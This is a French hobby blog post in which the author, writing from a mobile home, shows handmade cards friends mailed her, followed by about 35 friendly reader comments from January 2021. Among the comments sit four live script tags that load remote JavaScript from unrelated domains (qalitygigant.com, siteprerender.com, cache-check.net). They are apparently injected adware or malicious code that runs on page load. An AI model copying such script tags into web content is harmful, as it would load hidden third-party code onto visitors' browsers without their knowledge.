• Dans ma Bal....

     

     

    Dans ma Bal....

     

     

    Bonjour tout le monde.....

    Tout d'abord, quelques nouvelles, et pour répondre à vos questions via commentaires....

    Je vais bien, la vie en Mobil Home avec ma fille se passe bien, il y fait bon, pour celles qui ont  eu peur, je vous rassure, il y fait bon vivre malgré le froid extérieur....

     

    Dans ma Bal....

    J'ai de quoi m'occuper, j'ai préparé mes articles pour les 15 jours à venir (à raison d'une publication tous les deux jours sauf le week-end) puisque je rentre un week-end sur deux ! Je brode, je lis, je me balade et je regarde la TV....

    Vous avez remarqué mon affolement de ne pouvoir préparer mes articles, j'avais un problème dans les codes javascript.... Comme tout est revenu dans l'ordre..... Ce que je prenais pour un manque de connexion dans le mobil home ne l'est peut être pas..... Je vais quand même programmer et après je verrai.....

     

    Pour l'heure, je vous montre ce que j'ai reçu dans ma Bal, durant mon absence.... Je vous ai toutes remerciées par mail pour dire combien j'ai apprécié vos créas et, par la même occasion, vous informer de la bonne réception !

    Pour visiter les copines, cliquez sur la photo de leur créa....

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

     

     

     

    Dans ma Bal....

     

     

    Apparemment, les miennes ne sont pas toutes arrivées, envoyées depuis 15 jours....

     

    Je termine avec une créa faite avec des photos que ma fille a prise de nos colocataires du Mobil Home

     

     

    Dans ma Bal....

     

    A Retrouver dans la Rubrique "Week-End"-"Divers" ICI

     

     


  • Commentaires

    35
    Vendredi 22 Janvier 2021 à 12:17

    coucou valie 

    superbe les cadeaux de tes amies 

    dans ta bal 

    je connais le mobil home et c'est trés confortable 

    j'adore tes petits colocataires 

    bon week-end a toi 

    bises

    34
    Mardi 19 Janvier 2021 à 14:35

    une magnifique bal bravo aux créatrices. bisous liliane

    33
    Lundi 18 Janvier 2021 à 13:15

    Des petits présents qui font toujours plaisir et que tu mérite bien

    Bonne semaine les filles

    Gros gros bisous

     

    32
    Dimanche 17 Janvier 2021 à 22:07

    Coucou ma belle Valie, j'espère que tout va bien pour toi et ta fille. Je te souhaite une bonne semaine, bisou rose tendresse !

    31
    Dimanche 17 Janvier 2021 à 21:00

    Bonsoir Valie 

    je suis rassurée tout se passe pour le mieux dans ton petit cocon  vous avez bien chaud toi et ta fille 

    je suis contente aussi pour toi que tu as pu de nouveau préparer tes articles  comme tu le voulais . tu t'occupes bien .c'est le principal . je te souhaite une belle soirée  moi je vais aller sous ma couette ! regarder la télè ! ici dans ma région de L'Ain il a neigé 10 cm dans la nuit .

    Bisous d'amitié 

    30
    Dimanche 17 Janvier 2021 à 20:26

    Bonsoir ma douce Valie

    J'espère que tu as passé une bonne journée de dimanche , ici le temps est pluvieux, neigeux par moment et très gris.

    Gros bisous et à bientôt

    ton amie Janine

    29
    Samedi 16 Janvier 2021 à 21:39

    De bien jolies surprises dans ta BAL

    Jolis tous ces oiseaux.
    Bonne soirée et bon dimanche.
    Bisous.

    28
    Samedi 16 Janvier 2021 à 19:11

    Contente d'avoir de tes nouvelles et que tu sois bien là-bas.  Passe une belle fin de semaine.  Ici la tempête est arrivée.  Bye bye!

    27
    Qinoa
    Samedi 16 Janvier 2021 à 17:52
    Bravo aux copinettes pour ces belles cartes
    Bzz
    26
    Samedi 16 Janvier 2021 à 11:45

    Bonjour ma douce Valie

    Je suis contente de savoir que tout se passe bien.

    Un grand bravo à tes amies pour ces magnifiques cadeaux  je suis éblouie car je ne sais pas faire 

    Je te souhaite un bon week-end chez toi avec ta famille et je t'envoie de gros bisous d'amitié

    ton amie Janine

    25
    Samedi 16 Janvier 2021 à 11:29
    dane

    coucou ravie d' apprendre que tout va bien, j' avais vue ton billet SOS, mais lorsque je cliquais dessus  j' avais page introuvable, je vois que tu as été gâté c' est cool ,je suis en retard sur mes envois , je t' embrasse une bise a ta fille aussi a bientôt

    24
    Samedi 16 Janvier 2021 à 10:45

    Bon week end ma Valie tu as été bien gatée et c est très beau, ce sont des idées préconçues pour le mobil home si on m avait donné le choix  c est dans la nature et entourée d oiseaux que j aurais aimé vivre et dans un mobil home ou l on se sent libre et il y fait bon vivre on a les memes prérogatives que dans un appartement , profites en bien ma douce e tà bientot

    Bisous d affection

    23
    mamijojo77100
    Vendredi 15 Janvier 2021 à 20:11

    tout se passe bien pour vous deux  c est le principal..et bien sur un grand bravo pour les copinettes pour leurs creations tres variees.. gbisous et bon we. JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1610737763309" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    22
    Jeannine (cristal24)
    Vendredi 15 Janvier 2021 à 19:41

    Très belle série de cartes reçues, bravo à tout le monde. Elles sont très variées.

    Bonne continuation dans ton mobil home.

    A bientôt.  Bises.

    Jeannine

    21
    Jacline-H-49
    Vendredi 15 Janvier 2021 à 17:22

     

    elles sont toutes magnifiques ces cartes !!! Bravo à tes copinautes, de véritables artistes !

    Ton problème a l'air de s'être arrangé, tant mieux.

    Beau mobile home, vous devez être bien à l'aise toutes les deux.

    Et de plus il est ben chauffé.

    Bone fin de journée ma Valie

    GROS GROS BISOUS TENDRESSE de 

    Jacline 

     

    20
    Vendredi 15 Janvier 2021 à 17:17

    Coucou Valie

    Très belles créas de toutes tes amies qui t'ont ainsi manifestées leur amitié et tu  le mérites!

    Je te souhaite une très bonne soirée et un bon WE

    Gros bisous tendresse

    19
    Vendredi 15 Janvier 2021 à 16:08

    Allô ma belle Valie, tu as reçu de bien jolies cartes de tes copines, du bonheur pour ton coeur. Je suis contente que tout se passe bien pour toi et ta fille. Passe un beau week-end, ici on prévoit une grosse tempête de neige en fin de semaine, je ne sortirai pas. Passe un beau week-end, bisou rose tendresse et merci pour la création.

    18
    Vendredi 15 Janvier 2021 à 16:06

    ses des jolies cartes que tu a reçus sa a l'air d'être sympa ou et ta fille bon week-end gros bisous

    17
    Vendredi 15 Janvier 2021 à 12:54

    Contente de voir que tu as trouvé une solution ! (Tu as retiré le 2021 de la bannière ou c'est moi qui ai un bug d'affichage ?) 
    Plein de jolies créations dans ta BAL, les copinettes ont du talent ! 
    Moi ce matin, bien que j'ai horreur de ça, je me suis surprise à regarder des mésanges dans mon jardin !! 
    Plein de Gros Bisous et Bon week end 

    16
    Vendredi 15 Janvier 2021 à 12:45

    Une jolie bal à bonheur, je suis ravie pour toi et bravo aux créatrices!

    Tant mieux si tout se passe bie et vous avez bien chaud !

    Bisous et belle journée

    15
    Vendredi 15 Janvier 2021 à 12:31

    De jolies cartes dans ta BAL!! Bravo aux copinettes.....De belles photos de ces petits visiteurs et la vie en mobil home c'est super sympa et bien équipé pour affronter l'hiver, J'ai vécu avec mon mari et mon fils trois années pour le travail de mon époux.

    Bisous et doux week-end

    14
    Vendredi 15 Janvier 2021 à 12:26

    de magnifiques créas des amies

    je suis ravie si la mienne te plait

    super si ta ptite maison est confortable !

    bisous

    13
    Vendredi 15 Janvier 2021 à 12:26
    lamanuelle25

    Superbe bal à laquelle j'ai été ravie de participer! Bises Nadine

    12
    Vendredi 15 Janvier 2021 à 11:44

    De belles cartes dans ta bal.........bravo aux créatrices

    Bisous Pierrette67

    11
    Vendredi 15 Janvier 2021 à 11:39
    De bien jolies choses dans ta BAL ! J'aime bien vos petits colocs
    10
    Vendredi 15 Janvier 2021 à 11:36

    Ta boîte s'est remplie de merveilles ; bravo à toutes ;

    bon week-end ; bisous / Nicole

    9
    Vendredi 15 Janvier 2021 à 11:31

    Hello Valie 

    Contente de te retrouver !! C'est vrai que j'ai bien pensé à toi  dans le mobil home ! j'avais peur que quelqu'un te retrouve gelée mais comme tu nous rassures , c'est bon ! 

    Pour ce qui est de l'ordi , ce n'est pas toujours  facile de poster !! tu te débrouilles comme un chef 

    Passe un bon weekend , on se retrouve durant la semaine 

     gros bisous

    8
    Vendredi 15 Janvier 2021 à 11:21

    Bien  gâtée    bravo  à  toutes les  copines

      gros  bisous

     

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    7
    Jour de mai
    Vendredi 15 Janvier 2021 à 11:10

    Re coucou Valie, 

    Je suis heureuse de te retrouver plus sereine. 

    Quel beau billet, heureuse que vous soyez bien et la photo le prouve et les oiseaux s'ils viennent c'est que tout est comme ils aiment. 

    Merci pour ce joli partage. 

    Bonne journée de Vendredi et également bon week end. 

    J'ai honte ce que j'ai commencé n'est pas terminé mais trop à la fois avec l'anniversaire de ma Belle Soeur ce mois-ci ! Pardon mais je ne t'oublie pas. 

    Gros bisous ♥♥♥

    LN

    6
    Mamyvel
    Vendredi 15 Janvier 2021 à 11:06

    Bonjour Valie, très belle BAL, belles broderies... Magnifiques tous ces oiseaux ;-))

    Bises, bonne journée

     

    5
    Vendredi 15 Janvier 2021 à 10:53

    Bonjour ma Valie, contente de te retrouver chez toi...

    Une très belle BAL à bonheur, bravo aux copinettes pour leurs créations...

    Je te souhaite un vendredi agréable, mais également un très bon W.E

    bisous de Pat

    4
    Vendredi 15 Janvier 2021 à 10:46

    Contente pour toi ma tite Valie, ravissante BAL, Bravo aux Aminettes pour leurs créas !!!

    Mille Bisous tout doux.

    3
    Vendredi 15 Janvier 2021 à 10:37

    de très jolies créations et adorant la nature j' ai déjà pris le week-end avec les oiseaux . Je ne suis pas patiente pour faire de telles choses mais j' ai crochetée avant d'avoir de l' arthrose dans les doigts maintenant je m'occupe de mes titous, de mes poules et des animaux de la nature qui me font le plaisir de venir dans mon jardin , ci joint un groupe de mésanges noires à longues queues très rare d'en voir autant.https://youtu.be/HqPoycFuoZo
    Bises

    2
    Vendredi 15 Janvier 2021 à 10:34

    de bien jolis colocataires et ils chantent bien en plus ;) bon week end bisous

    1
    Vendredi 15 Janvier 2021 à 10:28

    Tu as reçu de belles créations !! ravie pour toi !! 

    Bises

    Thaly

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :